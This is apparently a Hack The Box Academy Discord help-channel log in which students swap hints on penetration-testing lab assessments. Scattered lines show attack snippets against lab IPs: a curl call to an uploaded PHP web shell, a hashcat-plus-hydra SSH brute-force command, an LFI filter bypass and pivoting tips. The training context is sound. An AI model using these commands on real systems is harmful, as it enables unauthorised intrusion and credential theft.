hi even I am stuck with the shell and payload section. Can I message u privately?

sure

tysm finally found it!

anyone available to get me some help/hint for the privesc for windows privilege escalation - skills assessment II? tried windows-exploit-suggester.py(listed a lot of them) and run some exploits that I got from winpeas but none of them did work.. thank you

Thanks.

@vital adder every day I see you grinding hard in here, whether I'm whining about shit I dont undertand or feeling amazing cause something clicks. You're here every day and deserve all the praise in the world.

You mustn't forget @fathom pendant . He also lives here

Need to hire them both for some 1on1 study time

$30/h :^) I'll just screen share me googling

How i can learn hacking

i'm not on there yet you can get 1 on 1 Tutoring 🤣 https://www.hackthebox.com/newsroom/discord-lab-tutoring

https://youtu.be/4JZjj_H4ei4

Attacking Common Services - Hard module

Can anyone help me please? I'm stuck for a few days.. I found user F**** and credentials to RDP.. tried to connect to MSSQL with it - seems the right way..
I tried everything -qsqh, and in win: SSMS and sqlcmd.. none worked.. Any help?

Give me one sec, I finished the module, ill have to look back at my notes.

No, I don't think I did. Sorry

Anyone available to give me some assistance on the file upload skill assessment? Been stuck for four days now....

hey guys, im on sql essentials module on running sqlmap on http request, i have dumped all the data but i dont know what the question of What's the contents of table flag2? (Case #2) is asking for.

Ugh, could use some help with the skill assessment in shells & payloads module. I'm stuck at the very beginning. I can not get a shell on host 1. I tried both Podalirius' tomcat shell from GitHub and crafting a war file with msfvenom. Nothing connects back the listener i have running on 443 on the foothold machine (which i RDP'ed into).

Solved: use SQLmap command directly instead of manually putting in the sql injection.

Are you sure you have the callback posting to the right IP? hint not the 10.x.x.x address

@sinful olive Would you like a dm?

im doing htb appointment
however i have the flag just this one stupid fucking question im stuck on
If user input is not handled carefully, it could be interpreted as a comment. Use a comment to login as admin without knowing the password. What is the first word on the webpage returned?

**s
the answer is supposed to be 15 letters long
i did what the task asked me to do but nothing showed up no error code which im assuming is the asnwer
and the word ends with "s"

Please Help on LINUX PRIVILEGE ESCALATION...Credential hunting I ssh into htb-student but no wp-config.php file exists. What amidoing wrong?

@dark hollow What part of the module are you at?

Page 9 Credential hunting

Did you utilize the find command they gave?

ffuf skills

Yes I did. I tried it again and found what I'm looking for thanks. Must of skipped over the file the first time.

Sure, feel free to DM

Thanks. I tried both, i believe. I will revert the target and re-try with the internal network IP.

footprinting, smtp, 2nd question, im using module ||auxiliary(scanner/smtp/smtp_enum) on metasploit|| i found a bunch of usernames but none of these are accepted, i tried doing it without ||metasploit||, with ||smtp-user-enum|| but it takes a very long time to do 10 million usernames, i tried the smaller wordlists without any luck, may i please have some help?

ATTACKING WEB APPLICATIONS WITH FFUF, Directory Fuzzing.... i have found the answer with gobuster in 5seconds....

with ffuf...nothing...

i dont like that tool...what do i wrong..?

Hi yes I'd like.. Thanks..

Appointment is a box, verify your HTB account in #bot-commands by typing in ++verify and following instructions and ask your question in #boxes

dw i got it all figured out

Just for future :)

Thank you!!

is it possible to filter these outs:

?

this is gobuster

i mean why would you use ffuf, when gobuster looks so clean?

ffuf has alot more functionality than just directory brute-forcing. Its a fuzzing tool. Go buster is more of a directory brute-forcing tool which has limited options for fuzzing.

alright....

Login Brute forcing - Skill Assessment: Website

Anyone wanna provide some guidance or a nudge? Wanna make sure I am using the right password list and method.

Hello! On the section Linux Local Password Attacks/Passwd, Shadow, & Opasswd.
I copied the shadow and passwd file, unshadowed and I'm running hash with rockyou to crack the root passwd.
It's taking long time and no results so far. Is this the way that is supposed to be or I am missing something here?

Yes you can filter those out by using -mc 200

You can also filter by response size. For example if you fuzzed and got a similar response size for non existent directories i.e Size: 1738 you can use - fs 1738 so ffuf only outputs responses that don’t have a size of 1738.

You can also use the -c switch which renders the output of the status codes in different colors

Yo

Hashes shouldnt take long to run against a password list

Maybe I am wrong, but general rule of thumb is password cracking or hash cracking shouldn't be taking over the lifespawn of the box.

Hello

anyone know why getting this errror

doing the--asreproast

This would be for Crackmapexec

error is Err no connection error (INLANEFREIGHT.HTB:88) name or service not known

Using Web Proxies - Web Fuzzer

Q: ... then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag...

Following the advice of others here, I just used burp instead. with the provided username list, it gave me 19 different hashes, but Im not really sure how to get the flag. I replaced the cookie with each individual hash and nothing.

using GetUserSPNs.py on a Windows 10 machine...getting Errno 111 Connection refused in Kali...

I think the question is for + or - 1 seconds right? It looks like yours goes from -2 seconds to + 0.001 seconds

I used start_time = now - 1105, end_time = now + 1105

The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt

File Inclusion/Basic Bypasses

Someone give me a hint? Been trying a few different things.

how could this work?

• 5 Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

what about it do you not understand?

could i dm you?

i got confused after i add last payload letter $a$

so yes

ive setup ssh -D 9050 and then ive used proxychains firefox-esr to an internal ip page (in attacking enterprise) and it works but it is extremely slow and I have lots of "temporary failure in name resolution" errors in my ssh -D 9050 session -- any ideas?

The slowness is normal.

ok thanks rat, i know this DNN is exploitable so im getting too excited to wait for the slow loads

You'll also experience those name resolution issues, as your extensions and such try to reach out to locations that they can't.

ah right i understand

One alternative for single hop proxy situations, you can use foxyproxy, instead of piping all of firefox through proxychains.

It can be set up for socks proxies.

oh yeh that is HEAPS better

i just set it on port 9050 withs socks 4

much much better

I don't know if foxyproxy supports multiple proxies (in a chain), but if it's just the one hop, it's definitely the better option.

yeh

thanks rat

cheers

it asked which app is disabled on startup

how can I tell from the results could anyone let me know or point me to some resources thanks (i got the answer since i just tried both of them but wanna know how without using gui xd)

am i the only one who thinks the pivoting tunneling and port forwarding skills assessment was very easy? 🤣

Please help!! #1024429874246590575

with what lol

not a furry lol

what is this on?

damn it's been a long time

you got this 🫂

Nah i can try

yeah but it was ages ago lol and i don't take good notes

https://www.epochconverter.com/

I remember using this thingy.

Also have you checked apache openmeeting bug?

You should if I remember.

I am offended you called me a furry 🤣

im not @forest tapir 👀

Wait what?

I'm the only punk rock lgbtqiaxtsvff12 furry here

no wait there's Emma but I don't think she's punk rock

nah there are bajilllions of furries on this server I swear to god.

For documentation and reporting, would DCSync count as a finding? Or how would you categorize it in a report if at all?

like, "got password for this user, they have dcsync perms, grabbed DC administrator hash, gg no re", how would you reflect that in a report?

As far as I understand, I think a 'finding' qualifies more as something that was a misconfiguration/vulnerability, in that respect. A user who is supposed to have a certain function/ability isn't technically a finding. Maybe something along the lines of 'excessive permissions' could qualify, if the permission is something that a user shouldn't have.

yeah but if not a finding, how would you opt for reflecting it in the report?

or do you just...not?

I think it depends on the situation, more than anything. If you get access to a user, because of a weak password, that's definitely a finding. However, if that user had domain admin, that isn't technically a 'fault' of the permission itself. You only abused the password aspect.

If a user had DCSync privileges because of some business need, it isn't technically a vulnerability - same as you would consider that a sysadmin needs access to certain functions, to do their job.

okay okay but thats not my question

my question is how do you reflect it, if at all, in the report

Well, if it's not a finding, it doesn't go in findings. ;D

cool, been established

hi

https://nohello.net

u got this ?

Have you tried this on pwnbox

?

it would

so maybe ur script is wrong

wait dm

you mus be playing with me

no

this isnt gen chat, discuss modules

oh right sorry

First time here hehe

idc

read #rules and #welcome too

yeah, but don't be standard internet guy about it

sorry. Won't happen again.

it literally happens 10+ times a day in this channel. A monks patience runs out eventually

hi

nohello.net

read #rules

https://nohello.net/

don't be a victim

ok

and #welcome

https://tenor.com/view/hi-hello-gif-22257481

why would you delete my message bro

@novel matrix when ya get the chance wanna yell at some people to stay on topic

Attack the target, gain command execution by exploiting the RFI vulnerability, and then look for the flag under one of the directories in /

How do i look around in other directories

just specify the path

ls+../../../root ?

im an idiot with this web stuff.

aaahhhhaha

got it

Thank you for the push.

For some reason i could navigate to other directories but not root. Which many now makes sense if i don't have priv

Yee

YEE

Hey

53

May I get a nudge with Attacking Common Services: Attacking FTP Question 3: Use the discovered username with its password to login via SSH and obtain the flag.txt.file. I’ve attempted hydra attacking ftp and ash with the provided module password list and rockyou.txt but have not found the password.

double-check if there isn't an "unusual" port that you can utilize

Oh I forgot to utilize hydra with the “unusual” port. Thank your for pointing that out! 😃

Hello,

Can someone help me with the Command Injection Module Skills Assessment?

Im able to move files to the tmp folder and capture the request in burp but not sure where to go from here.
http://142.93.33.226:30942/index.php?to=tmp&from=605311066.txt&finish=1&move=1

Looking at the response in repeater gives me a thousand lines of code and not sure where to go next. Can someone nudge or dm me please?

did u resolve that problem with dcsync?

Didn’t find anything utilizing hydra and “unusual” port with the provided password list from the module and attempted hydra attacking ftp with the “unusual” port. Any other hints?

it should be a high number port, if you are not seeing it feel free to reset your target

high number -> between 1000-9999

Thank you! Will try that

May I dm you to not spoil anything

sure go ahead

sudo apt install mariadb

https://unix.stackexchange.com/questions/584194/error-installing-mysql-in-parrot-linux

#Attacking DNS - ATTACKING COMMON SERVICES
I found the h*, but when I do axfr it simply doesn't work.. Any help?

Hello, I would like to ask, what type of content I can found in modules, this is text-based learning experience, or there are videos ?

No videos as it isn't allowed past Tier 1 and up

Hi,
On the shell & payload module in the final engagement i have a serious problem with the box !!!
I tested on my kali and pwnbox and is the same.
We need to use freexrdp or remmina (I tested both) but every time the connection is lost with the box it is impossible to work ....

i faced exactly similar issue a while ago

Oh no ....
Isn't there anyone from the support team here to do something?
Impossible not to complete the module!

i think support team will help u

thank you

Could someone confirm that this module https://academy.hackthebox.com/module/details/143 will be video-based ?

be more specific

a video walkthrough of the information created by someone from htb?

I just wonder what I can expect in this module, as I see lot of topic are listed, but I don't know how knowledge is delivered 🙂 articles with examples and labs task, or there is trainer explaining topics like on udemy

if you have some experience with academy, you should know that there aren't any videos by instructors and that the information/module/section is developed by the creator(s) of the module it self

thank you

Hi, i alredy upload php shell file in right path of WebServer. But i'm only able to execute only some commands like:
curl http://10.129.236.12/shell.php\?c\=whoami nt authority\system

How can i obtain a rev shell ? Thanks

multiple ways, powershell oneliner, uploading a file then executing it and etc

What the best way to contact them ?
There is no support mail on HTB Acadmy.

on htb-academy site u can see this htb logo at bottom right corner

From here u can send messages

to the support team

My email is not accepted on this support

that's odd

When i open th echat i have this question.
If i select not really th echat is close and with the other option it ask me an email ...

When doing the linux based stack overflow challenge, after entering the buffer and nop sled into gdb, i went to check the memory, but found a bunch of C2 inside the nop sled, any workarounds for this?

Ok for information to contact the support use firefox, not chrome.
And if you have a problem with your connection in RDP use your VPN in TCP connection not with UDP.
A support with an incredible reactivity !!
Let's go to continue my module 😉

hello everyone i have bought pen 200 (oscp) and i am doing pronving grounds play and practice before this i have done good amount of ctf machines on hacthebox i have experience and i will gave exam in 2.5 months so i want a partner to study with me but not beginner if anyone interested so please message me 🙂

stuck on the 5th and 6th question of the pivoting tunneling skills assessment, a nudge in the right direction would be appreciated. The farthest I've gotten is getting a meterpreter shell on PIVOT-SRV01. When I run ping_sweep from that machine, there are no other machines, so I'm not sure what to do next. I know the hint ||says that we might get something from lsass||, but I'm not sure what to do with it nor do I understand how that will help me reach the DC.

Ugh, this is getting annoying. I'm stuck at the skill assessment in the shells & payloads module. I can not get a shell on host 1. I tried both the tomcat with a msfvenom crafter war payload en the local inlanefreight website with laudanum. Whatever i try i can not get it to work.

I remember I got it to work by uploading using the Burp Suite browser and referring to the "Bypassing File Type Restriction" section in PHP WebShells

I know I also used the Antak webshell, just don't remember if it was on the first host or not

Okay, thanks. Will try that out. Which IP did you use for ||LHOST||? I can';t connect my listener on NC.

Also, I'm pretty sure that reverse shells don't work

This is an extremely frustrating and vague skill assessment imo, not a fan.

That's why you need a webshell

I got stuck on that for a bit too

I am going to try it now. Is it okay if i DM you, if we need to continue this conversation?

no problem

Thanks alot.

Goddamn son, IIAntak|| did the trick! That was the best and most direct solution. I was trying to do a lot of complicated stuff with reverse listeners, LHOSTS, etc. The sample in the cheatsheet about created custom msfvenom payloads for war files got me all messed up. IIthe tomcat route did not work for me, or better said i don't know how to get that working. So i went with Antek (as you suggested) and the vhost route||.

Glad you were able to progress!

Me too.

Bringing this back up...

Hi! I'm having the same problem. Did you solve it?

Yea i finally managed to solve it, by doing import sys; sys.stdout.write(b'\x41' * ....) instead of using print

Okay thanks 🙂

resource that i used
https://stackoverflow.com/questions/71415316/kali-linux-buffer-overflow-nopsled-passing-weird-value

I've just solved using print but using python2 instead of python3. It's another workaround 🙂

Im on module: Password Attacks, section: PAssword mutations. I used custom.rules, best.rules from hashcat bruteforced FTP instead of SSh cuz it's faster. Im stumped

so that particular question cannot be solved in the time they allot. Take your mutated password list, delete the first 17000 or so from the top of the list and start it again.

"What is the name of the executable file associated with the Local Security Authority Process? " cuz apparently it's not || lsass.exe ||
can anyone help me 🙂 and sry for the dumb question

which machine is it

actually it is

it's from attacking lsass from password attacks

well i thought so too but htb academy disagrees with me

Someone else has issues with the FTP Service on the Attack common services Lab? i scanned the system with nmap but got this:

make sure you dont have a space or something. That is the answer that I used and it was correct.

oh im stupid, i think it bugged out on me and i had to refresh 🤦‍♂️
thank you for the time

what is your output

i think im not allowed here to share my screenshot 😄

but got this as output:
nmap -p21,2121 10.129.176.202
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-22 16:16 CET
Nmap scan report for 10.129.176.202
Host is up (0.086s latency).

PORT STATE SERVICE
21/tcp closed ftp
2121/tcp closed ccproxy-ftp

Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds

im not sure what the issue is then?

dm me if you want

usually a reset on that target fixes the issue

what hashcat rule to use

I've tried everything i can, please help me with these Which option needs to be set to create a home directory for a new user using "useradd" command?

Which option needs to be set to lock a user account using the "usermod" command? (long version of the option)

https://man7.org/linux/man-pages/man8/usermod.8.html

help

use the mutated password list and filter words starting with b and use them

I need a little assistance on the LINUX PRIVILEGE ESCALATION Module. Page 11 shared object hijacking. I SSH into htb-student run ls -la payroll and it always tells me no such file or directory???

dont need any rules

?

than what wordlist

the mut password list you created

yes

and didnt work

try to find it, it might not be in your current working directory

create your list. hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list then run hydra hydra -l sam -P mut_password.list ssh://<ip address>

its wierd i did the same

guess 1 time more wont hurt

did you see what I said earlier about deleting the first 17000 entries?

yes

the password resides between 18000 and 19000

thank you, I'll make that

make sure you have this too

ok

but actually how is it possible to get so many entries

$ wc -l mut_password.list
1504 mut_password.list

how i can gain cube without buy it?

Complete modules

ok , how many modules i can end without buying?

all?

No one? 😢

you are appending the rule to an existing wordlist containing password, hashcat will generate a new wordlist based on the rule that you specify

nope

ok how much i can cover?

log into the website you will see

i seen , but i didn't end all the basic and only i want to know

but ok no problems , thx

just realised that the resources U download give U already custom.rules now it makes sense

yes

I made it thx for help

Hello guys, I am having trouble finding a flag in the 'GET' Section of the 'Web Request' module in the academy platform. Even when I use curl i dont see any flag in the http headers.

Install it

have you tried searching for something using the search feature?

Yes, I did and it doesn't take me to the search.php file, but when i use the search.php it still doesn't display any flags.

I have already sorted this, i was using an incorrect search term.

I am doing the windows fundamental module and in the windows security sub page, I don't think I understand the final question. I am running the command Get-Service | Where-Object {$_.StartType -eq "disabled"} to get all the disabled services but none of them are the answer it is asking for. Can someone help clarify the question? (i tried all of the Name objects as answers) i am thinking the Open ssh is the 3rd party one as i think the official one is called sshd

Can someone help me with the Command Injections - skill assessment please?

May I get a nudge with Attacking Common Services: Attacking FTP Question 3: Use the discovered username with its password to login via SSH and obtain the flag.txt.file. I’ve attempted hydra attacking ftp and ash with the provided module password list and rockyou.txt but have not found the password.

❤️ academy 🙂 I I'm kinda lacking in my knowledge of how certificates work. Would be great to see a certificates module in academy 😄

hint ||the move parameters||

hint there is ||multiple ftp|| and do some enum first before you brute force

so which section are you in? i'm too lazy to double check on the academe and my note have no section with that name

the hint in that section will lead to some ||cred|| and for the finding the next machine part i would suggest a gui tool named wnetwatcher or use the given cmd ping sweep

Thanks for the reply, may I dm you?

sure

Need some help on Attacking Common Applications - Attacking GitLab. Looks liek the exploitDB that is in the section doesn't seem to work.

Getting errors like $'\r' command not found and syntax errors

Got it to run but getting LOOP and 302 output haha
^ this was intended and got the answer

I'll take look at what the hint leads to again, but regarding ping sweep, there were no other machines in the || 172.16.6.0/16 subnet ||

did you use the powershell ping sweep?

@fierce pewter Can I DM you regarding this one? (or @livid pier)

that one doesn't work for me so i have to use the wnetwatcher tool but when re-doing my note for this i give the cmd ping sweep a try and that worked for like every time

oh yeah @livid pier thanks for the hint ❤️, i only got that because of your hint 🤣

Hi, I'm Rory. nice to meet u

https://nohello.net

#rules #welcome

glad i could help

I am working on the hashcat module in academy. I am on the WPA/WPA2 section. I am wondering how to get the pcap files into the pwnbox available for academy?

If it is in the module resources you can wget the url for the resource

Login Brute Forcing - Skill Assessment Website: I am stuck on the first question, been running brute force against the IP. I believe I am missing something simple as others all seem to easily be able to get the first question. Been stuck on this question for some time, help would be appreciated!

wget

yep or if you want to upload something on to the pwnbox you can use updog with ngrok

a list that is in the cheatsheet will get you the credentials

pay attention to the request that is being made upon logging in

Can you copy the link then do a wget from the pwn box?(sorry didnt read the other 2 responses that said the same thing)

yes, I was able to get the files with wget. for whatever reason now though, I can not unzip them

if you cat the files, did you get the actual zip

or was it the server response

if I cat it out, I get a bunch of HTML so probably just got the server response?

Didnt see the cheat sheet had that, but I have been using the cred lists. I am just wondering if the command I am using is messed up due to be.

yes

im guessing you did wget http://-something -o filename.zip

try it without the -o

when you wget on powershell you need the -o

Atleast i think so, im wrong alot

The other two longer options you have if this doesnt work

save the files to something like google drive then access that on your pwnbox

log into academy from the pwnbox instance

that might have to be what I resort to because I was not using the -O option before.

lol maybe try it with the -o option first then

@visual quail

idk if pwnbox is different

I ended up getting it by signing in with pwnbox and got it.

could be

That boy dont dance but he makes moves

@visual quail i was working on a WPA problem in pico this morning and i used this tool for the first time

if pwnbox has it you might want to run it when you are done with the section to try it out

I will have to give that a try too!

always more that one way to solve a problem!

exactly just like we learned from trying to download the pcap to begin with, we need multiple routes

for sure!

Ill keep trying but do you mind if I dm you the command to check to ensure it is wrong ?

sure

Hello everyone! anyone working in the bash scripting module. I`ve been stuck for a while in the comparision operators section.

@arctic sentinel What ye stuck on?

Phew That footprinting module was a big one

ah I used metasploit's ping sweep and the powershell version of ping sweep

I'm going for another run at it and I'll try it out

i haven't try it but i think the metasploit one should work

but still not 100% sure

Thank you @vital adder

That one tripped me up too

bro why are "easy" machines not even easy, am i just so inexperienced in some of these or are they sometimes not rated properly

not relevant to this channel. But the answer is that HTB is notoriously more difficult than other platforms. HTB easy is other platforms medium and hards

also #rules and #welcome

you can verify your HTB account in #bot-commands with ++verify alongside reading #rules and #welcome

thats very good to hear because if people who can solve those machines easily than its just not even worth it for me lol

alright will do

not sure if im allowed to mention it in this server but would thm be a better platform?

for intermediate

that is off-topic for this channel; this is why we are pushing you to verify your htb account and ask in another channel that you'll have access to once verified

ah got it

have you tried obfuscating with html encoding? or if it's blocking traversal you can try doing ....// as MOST filters that filter for directory traversal filter out the single ../ leaving the remaining one that should work

are you testing using a common read/read/write directory?

i'm not familiar with that unfortunately I was just throwing things out there that i've seen suggested in this channel

gl

maybe re-read the module; maybe there's something you missed?

at least until someone smarter than me pops in and is like "have you done very obvious thing"

Well, machine died again and I've tried all methods I could think of to find another machine on the network and there is nothing. I dumped sam and secrets but I don't know what to do with them 😅

and it seems like PIVOT-SRV01 is the DC according to the Server Manager app

did you try the tool i suggested?

yes

no idea what you mean by this but that machine isn't "the DC"

give me a sec i'll give this a check

There's a Server Manager application on that machine and from reading the information it shows, I understand that PIVOT-SRV01 is the Domain Controller

just to be sure, you're saying that there's another machine on the 172.16.6.0 subnet?

yep

i wish i did save as much info as a did for each machine in offshore but the SRV01 machine is a windows server not a domain controller or it's domain controller in domain controller 🤣 not sure if this is possible but i just can't say with the info that have right now

yeah... well crap

pivot-srv01 is a pivot server not a domain controller just because it has a server manager application open up does not make it a DC

no idea how to find the other machine on that subnet

it just means it's acting as a server

ah okay, but shouldn't it at least show the DC it's connected to? I couldn't find any other servers

for /l %i in (1,1,254) do @ping -n 1 -w 100 192.168.0.%i | findstr "Reply" run this in command prompt

I tried that

You are on the right track. You can try which operator is not blocked first and use its encoded version from the table in the module. After that you can inject

in the 172.16.6.0 subnet

and you ping swept that net yeah?

doing the file inclusion module > lfi and file uploads > i uploaded the image and got the cmd > but m stuck there is a file with .txt it toolks like a flag when i used cat it showed me GIF8 i thought its the flag but its not and inside GIF8 is empty what to do ? help pls

the only response was from the same machine

did you also find the creds for other user?

yes, nothing other than itself

which module are you doing again? sorry that got lost somewhere

I haven't tried cracking the hashes but I dumped sam and secrets

tunneling and pivoting skills assessment

once in as the <first user> that you get from the foothold you should be able to jump to the 172.16.5.0/23 subnet using the credentials ; once on THAT one it's on the .6 subnet

help pls

can I DM you?

oh wait i can't find the machine either

yeah let me pull up my parrot to see if I can jump in and run it real quick to confirm

see? 😂 this has been driving me crazy